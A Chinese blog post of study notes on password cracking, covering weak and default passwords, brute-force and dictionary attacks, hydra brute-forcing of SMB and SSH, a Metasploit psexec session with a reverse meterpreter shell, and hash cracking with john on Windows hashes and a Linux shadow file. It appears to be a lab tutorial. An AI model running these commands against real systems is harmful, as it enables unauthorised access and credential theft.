2022-07-04 口令破解

一、口令安全现状

    @        弱口令

    类似于123456、654321、admin123等常见的弱密码。

    @        默认口令

    很多应用或者系统都存在默认口令。比如phpstudy的mysql数据库默认账密【root/root】,Tomcat管理控制台默认密码【tomcat/tomcat】

    @        明文传输

    比如http、ftp、telnet等服务,在网络中传输数据流都为明文,包括口令认证信息等。这样的服务,又被嗅探的风险。

在线破解方式:账密需要认证

            用户名未知

            用户名已知

            使用工具hydra

离线破解方式:密文还原成明文的过程。

二、暴力破解

    暴力破解就是利用所有可能的字符组密码,去尝试破解。下表是根据不同位数生成密码的空间大小。

字符集        密码位数        密码空间

0-9                8位                10^8=100000000

0-9a-z            8位                36^8=2821109907456

三、字典破解

    如果能通过合理的条件筛选或者过滤掉一些全字符组合的内容,就会大幅度降低破解的成本,我们把筛选出的密码组合成特定的字典,再用字典爆破密码也是可以的,但是这样做可能会漏掉真正的密码。密码字典大致分为以下几类。

    @    弱口令字典

    比如123456、admin等这样的默认口令或弱口令

    @    社工字典

    人们在设置密码的时候,为了便与记忆,密码的内容和组合会与个人信息有关,比如常见的密码组合“名字+生日、名字加手机”等

    可以使用cupp工具,但是此工具是国外人开发的。

    crunch工具的使用

四、window远程密码破解

使用hydra工具进行破解

-l        指定一个用户名

-p        指定一个密码

-L        指定一个用户名字典

-P        指定一个密码字典

-vV        显示爆破细节

-o          保存爆破结果

-f        找到正确的密码就停止爆破

-e

        n        null

        s        same

        r        反向

远程爆破windows:hydra -l administrator -P pass.dic smb:// 127.0.0.1

远程爆破linux:hydra -L  -P pass.dic  127.0.0.1 ssh

五、使用msf连接windows

在已知windows账密的情况下,可以使用msf对其进行连接,同时使用对方的命令行。

@    msfconsle

@    use exploit/windows/smb/psexec_psh

@    set payload windows/meterperter/reverse_tcp

@    set RHOSTS 172.16.132.145

@    set SMBUser ajest

@    set LHOST 172.16.132.128

@    exploit

六、John的使用

    @windows hash 值破解

    hashdump

        windows hash 值破解一共需要两步操作。首先我们使用QuarksPwDump工具读取windows账户密码hash值,然后在使用john工具破解。

    john win2k8.hash --format=NT --wordlist=/root/dic/pwd.dic(必须为绝对路径)

    john win2k8.hash --show --format=NT

    @linux口令破解

        linux口令破解,也分远程破解与本地破解。远程破解主要是爆破ssh服务,属于在线密码攻击。本地破解需要拿到linux的shadow文件,进行hash值破解,属于离线密码攻击。

        在线密码攻击:hydra -L /root/dic/user.dic -P /root/dic/pass.dic ssh://127.0.0.1 -vV -o 127.ssh

        离线密码破解:使用john工具对shadow文件进行破解。

john shadow

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 220,492评论 6 513
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 94,048评论 3 396
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 166,927评论 0 358
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 59,293评论 1 295
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 68,309评论 6 397
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 52,024评论 1 308
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,638评论 3 420
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,546评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 46,073评论 1 319
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,188评论 3 340
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,321评论 1 352
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,998评论 5 347
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,678评论 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,186评论 0 23
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,303评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,663评论 3 375
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,330评论 2 358

推荐阅读更多精彩内容